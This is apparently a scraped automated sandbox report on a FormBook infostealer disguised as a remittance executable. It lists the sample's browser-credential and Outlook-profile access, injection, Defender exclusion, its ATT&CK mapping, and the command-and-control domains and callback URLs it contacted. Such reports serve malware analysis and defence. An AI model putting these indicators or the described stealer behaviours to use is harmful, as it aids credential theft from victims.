            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447924 Sample: 4TH HIRE SOA REMITTANCE_USD... Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 55 www.tranivel.com 2->55 57 www.retrorocketmodels.com 2->57 59 21 other IPs or domains 2->59 71 Snort IDS alert for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 11 other signatures 2->77 10 4TH HIRE SOA REMITTANCE_USD280,000.exe 7 2->10         started        14 GRogNEHvcL.exe 5 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\...behaviorgraphRogNEHvcL.exe, PE32 10->51 dropped 53 C:\Users\user\AppData\Local\...\tmp16FF.tmp, XML 10->53 dropped 87 Adds a directory exclusion to Windows Defender 10->87 89 Injects a PE file into a foreign processes 10->89 16 4TH HIRE SOA REMITTANCE_USD280,000.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        91 Multi AV Scanner detection for dropped file 14->91 93 Machine Learning detection for dropped file 14->93 25 schtasks.exe 1 14->25         started        27 GRogNEHvcL.exe 14->27         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 16->67 29 vFRZZQiLgeOQDzGymvZVa.exe 16->29 injected 69 Loading BitLocker PowerShell Module 19->69 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 95 Found direct / indirect Syscall (likely to bypass EDR) 29->95 42 winver.exe 13 29->42         started        process11 signatures12 79 Tries to steal Mail credentials (via file / registry access) 42->79 81 Tries to harvest and steal browser information (history, passwords, etc) 42->81 83 Modifies the context of a thread in another process (thread injection) 42->83 85 2 other signatures 42->85 45 vFRZZQiLgeOQDzGymvZVa.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 61 www.diplocity.org 78.142.211.199, 49732, 49733, 49734 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 45->61 63 newmediamonday.com 173.254.28.213, 49752, 49753, 49754 UNIFIEDLAYER-AS-1US United States 45->63 65 11 other IPs or domains 45->65 97 Found direct / indirect Syscall (likely to bypass EDR) 45->97 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            4TH HIRE SOA REMITTANCE_USD280,000.exe42%ReversingLabsByteCode-MSIL.Trojan.Barys
            4TH HIRE SOA REMITTANCE_USD280,000.exe55%VirustotalBrowse
            4TH HIRE SOA REMITTANCE_USD280,000.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\GRogNEHvcL.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\GRogNEHvcL.exe42%ReversingLabsByteCode-MSIL.Trojan.Barys

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.botcsllc.com0%VirustotalBrowse
            webredir.vip.gandi.net0%VirustotalBrowse
            www.diplocity.org0%VirustotalBrowse
            lb.webnode.io0%VirustotalBrowse
            newmediamonday.com1%VirustotalBrowse
            duhocvietanh.edu.vn0%VirustotalBrowse
            www.double.gay1%VirustotalBrowse
            www.newmediamonday.com1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ogp.me/ns#0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js0%Avira URL Cloudsafe
            https://www.instagram.com/hover_domains0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=8290e35a9b0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js0%VirustotalBrowse
            https://www.instagram.com/hover_domains0%VirustotalBrowse
            https://events.webnode.com/projects/-/events/0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.ico?ph=8290e35a9b0%Avira URL Cloudsafe
            https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)0%Avira URL Cloudsafe
            http://www.tranivel.com0%Avira URL Cloudsafe
            http://www.adylkerak.ru/1jr4/0%Avira URL Cloudsafe
            https://www.reg.ru/support/#request0%Avira URL Cloudsafe
            https://newmediamonday.com0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://duhocvietanh.edu.vn/iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujw0%Avira URL Cloudsafe
            https://events.webnode.com/projects/-/events/0%VirustotalBrowse
            https://files.reg.ru/fonts/inter/Inter-Regular.woff)0%Avira URL Cloudsafe
            https://www.reg.ru/support/#request0%VirustotalBrowse
            https://www.hover.com/domains/results0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            https://newmediamonday.com1%VirustotalBrowse
            http://www.newmediamonday.com/f1h2/?4b34ht=o2w0OkdzOU7AeO8cST1vLwAMb2MVSZPok4SxmOvOEN/vFfcFf0cZDVwWJD0TY2twL06giNetwFt+I5xckOsROdTXbf+WwKvZ5D3dZkP4IlWKwwnosj8+1uAXlawkkcomhg==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon-16.svg?ph=8290e35a9b0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=8290e35a9b0%Avira URL Cloudsafe
            https://server27.hosting.reg.ru/manager0%Avira URL Cloudsafe
            https://www.hover.com/domains/results0%VirustotalBrowse
            http://www.btx937.top/gp7t/0%Avira URL Cloudsafe
            http://www.retrorocketmodels.com/vtm3/?4b34ht=kR7Fl86BSFGGM0PlM+jb3Z8U1XiTwr46KttiVv2q+FBEIB4NiNNJYHhFj5b5v2TtaYgnHWWiT/h6cxdEcVnMTV8uD5XBSlgGjz30dZ+o/GujFcx5HUknEw/XEJ5xYkmM6w==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            http://www.cica-rank.com/fx5q/0%Avira URL Cloudsafe
            http://www.pilatovparts.ru/k2o4/0%Avira URL Cloudsafe
            http://www.adylkerak.ru/1jr4/?4b34ht=kGdd1iddr+mvgzlLI3SGjgxAabUOGsKw2bG4JPXV9hwIwsQyE7CLPYW2F+PDsbjHTDHawkku/URFrqQj7JM/kB2xKVcJ0yqZ4Q9OBe3AFA9XjQjtHcn6JNxir1+KynzC3w==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            http://feeds.soundcloud.com/users/soundcloud:users:38128127/sounds.rss0%Avira URL Cloudsafe
            http://www.falldove.top/ewqf/0%Avira URL Cloudsafe
            https://twitter.com/hover0%Avira URL Cloudsafe
            http://www.retrorocketmodels.com/vtm3/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://twitter.com/hover0%VirustotalBrowse
            http://www.btx937.top/gp7t/?4b34ht=rAqEu2gSv2s2Q34sajdUQRUadeB85tkFqSKdenQDQ2DGw2dO3uX5Zw6KDTM8IV3Tf+lQDmhmNxGX2EN4uh2PDjjxVn+OEzZBTy/UzpMaoQhQyJClBqNmt4mNfKWMNb1t7Q==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/19/19m/19mvcd.css?ph=8290e35a9b0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/2r/2rd/2rdzz2.css?ph=8290e35a9b0%Avira URL Cloudsafe
            https://files.reg.ru/fonts/inter/Inter-Medium.woff2)0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.botcsllc.com/wouf/0%Avira URL Cloudsafe
            http://feeds.soundcloud.com/users/soundcloud:users:38128127/sounds.rss0%VirustotalBrowse
            https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=8290e35a9b0%Avira URL Cloudsafe
            http://www.lesfleursdeceline.be/11y6/0%Avira URL Cloudsafe
            https://2domains.ru0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net0%Avira URL Cloudsafe
            http://www.botcsllc.com/wouf/0%VirustotalBrowse
            https://d1di2lzuh97fh2.cloudfront.net/files/17/178/178on3.css?ph=8290e35a9b0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net0%VirustotalBrowse
            http://www.lesfleursdeceline.be/11y6/?4b34ht=Dwy6CWGja1kYD5j/NiyuAt+/fS8dx1oXABRd8IB5T1BIX3lRMt9N7dOmg29JYmKAoU96l3n9gZEsdf5amHP+judxC5mcbKzq6E6B/htT/kbgwKzkG09OKna/oGm6dpHmyw==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            http://www.jl884.vip/viqu/0%Avira URL Cloudsafe
            http://www.jl884.vip/viqu/?4b34ht=MVCyVDN3RwNEbgSUD+0xRye29v/XSHfdB7daKMb285I6uLH+in3mV6SqMrakijFPfITBXvDDRnIloAD3dOOGlBaUMS2RVppA4PBahCfW4PrIZhDLLp/ysGvZxQcLTJd5vQ==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            https://2domains.ru0%VirustotalBrowse
            http://www.diplocity.org/l1oh/0%Avira URL Cloudsafe
            http://www.duhocvietanh.edu.vn/iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwAxJrjpsvX+qRkMbJbRaZT89LHtus1xeGcvR3FY7l2IYkKTCFrV4doYlBH8GHezxeD3NhTg==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/2i/2iw/2iwzy5.css?ph=8290e35a9b0%Avira URL Cloudsafe
            http://www.tranivel.com/fr5e/0%Avira URL Cloudsafe
            http://www.cica-rank.com/fx5q/?4b34ht=58zXcaw4QDLVkaL+G0qZOwfYBtfLZlBf9k0Qnw1Zv4bR0GQyFI5ORfMwVsCUT1zQejwif13gDfh0mdA+c9yRzCT9PqSg1LoC16c3+fSR0wz9mE2aSN+j+I+5sdCG7jTd0Q==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            http://www.equi-sen.ca/oh6m/0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=8290e35a9b0%Avira URL Cloudsafe
            https://files.reg.ru/fonts/inter/Inter-Medium.woff)0%Avira URL Cloudsafe
            http://www.falldove.top/ewqf/?4b34ht=kYShQH1sa3Le60gDrsgCYGFyuVEpRJ0k4IW5QzbfeKprYk61XZyNmSsEdCDrGrgTxI+6jeCx+L1A4qHHQky9AsRR7ruU+KhrWGBfvU9SpfMi+rY6DVY8elzf7b7Bw6Cu6g==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            https://codepen.io/uzcho_/pens/popular/?grid_type=list0%Avira URL Cloudsafe
            http://www.diplocity.org/l1oh/?4b34ht=CLj62WE97PINjru9/2Ua0S4wJ+6clgTBZzFqYLe+Zb/mrkE/j+GqxKOEwyxDIhmnv5tawjcWYXQUR2YOfRR5ys/k8mvsQ8S8w9omXjrMO8RJvp8vgkkqsEYyw/rrHr7WOA==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            https://codepen.io/uzcho_/pen/eYdmdXw.css0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/49/49x/49xmuk.css?ph=8290e35a9b0%Avira URL Cloudsafe
            http://www.newmediamonday.com/f1h2/0%Avira URL Cloudsafe
            https://www.lesfleursdeceline.be/page-not-found-404/0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=8290e35a9b0%Avira URL Cloudsafe
            http://www.botcsllc.com/wouf/?4b34ht=XRItmHXywGWVnqDngINAMvff3IpqjclEV1ySHuRZOTcLzBiyF5+l3MoobodW+p084j4Tu28tOugkX2LbOW2aRLZQ/Vv/K47AM9XykbCYypLB0HUyScM9sRvicmb0LC0c/g==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            https://files.reg.ru/fonts/inter/Inter-Regular.woff2)0%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.svg?ph=8290e35a9b0%Avira URL Cloudsafe
            https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-4040%Avira URL Cloudsafe
            https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=8290e35a9b0%Avira URL Cloudsafe
            http://www.pilatovparts.ru/k2o4/?4b34ht=qS1OWRHNQ56Cw7+fPD172OEEUbCPY94RPpebPz6xreoqxXbgy7Cu/Z+GqTqWS2Pyzkow4Xyx1yLx23Wbx34O9asPPjW4w1AqTiokyKtl/e0W2Htu8J9pM1VOgBMsot7LIg==&UxF=2Nflznk0WJ3hjv0%Avira URL Cloudsafe
            http://www.duhocvietanh.edu.vn/iqzp/0%Avira URL Cloudsafe
            https://reg.ru?target=_blank0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.botcsllc.com
            		216.40.34.41
            		truetrueunknown
            webredir.vip.gandi.net
            		217.70.184.50
            		truefalseunknown
            www.pilatovparts.ru
            		31.31.196.16
            		truetrue
              		unknown
              www.diplocity.org
              		78.142.211.199
              		truetrueunknown
              lb.webnode.io
              		3.125.172.46
              		truetrueunknown
              www.equi-sen.ca
              		199.59.243.225
              		truetrue
                		unknown
                newmediamonday.com
                		173.254.28.213
                		truetrueunknown
                www.cica-rank.com
                		183.181.79.111
                		truetrue
                  		unknown
                  www.adylkerak.ru
                  		51.195.44.77
                  		truetrue
                    		unknown
                    94950.bodis.com
                    		199.59.243.225
                    		truetrue
                      		unknown
                      www.falldove.top
                      		66.29.149.46
                      		truetrue
                        		unknown
                        e6375a47.jl884.vip.cname.scname.com
                        		65.181.132.158
                        		truetrue
                          		unknown
                          duhocvietanh.edu.vn
                          		103.138.88.50
                          		truetrueunknown
                          retrorocketmodels.com
                          		3.33.130.190
                          		truetrue
                            		unknown
                            www.duhocvietanh.edu.vn
                            		unknown
                            		unknowntrue
                              		unknown
                              www.lesfleursdeceline.be
                              		unknown
                              		unknowntrue
                                		unknown
                                www.retrorocketmodels.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.btx937.top
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.tranivel.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.jl884.vip
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.newmediamonday.com
                                        		unknown
                                        		unknowntrueunknown
                                        www.double.gay
                                        		unknown
                                        		unknowntrueunknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.adylkerak.ru/1jr4/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.newmediamonday.com/f1h2/?4b34ht=o2w0OkdzOU7AeO8cST1vLwAMb2MVSZPok4SxmOvOEN/vFfcFf0cZDVwWJD0TY2twL06giNetwFt+I5xckOsROdTXbf+WwKvZ5D3dZkP4IlWKwwnosj8+1uAXlawkkcomhg==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.btx937.top/gp7t/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.retrorocketmodels.com/vtm3/?4b34ht=kR7Fl86BSFGGM0PlM+jb3Z8U1XiTwr46KttiVv2q+FBEIB4NiNNJYHhFj5b5v2TtaYgnHWWiT/h6cxdEcVnMTV8uD5XBSlgGjz30dZ+o/GujFcx5HUknEw/XEJ5xYkmM6w==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cica-rank.com/fx5q/true
                                        • Avira URL Cloud: safe
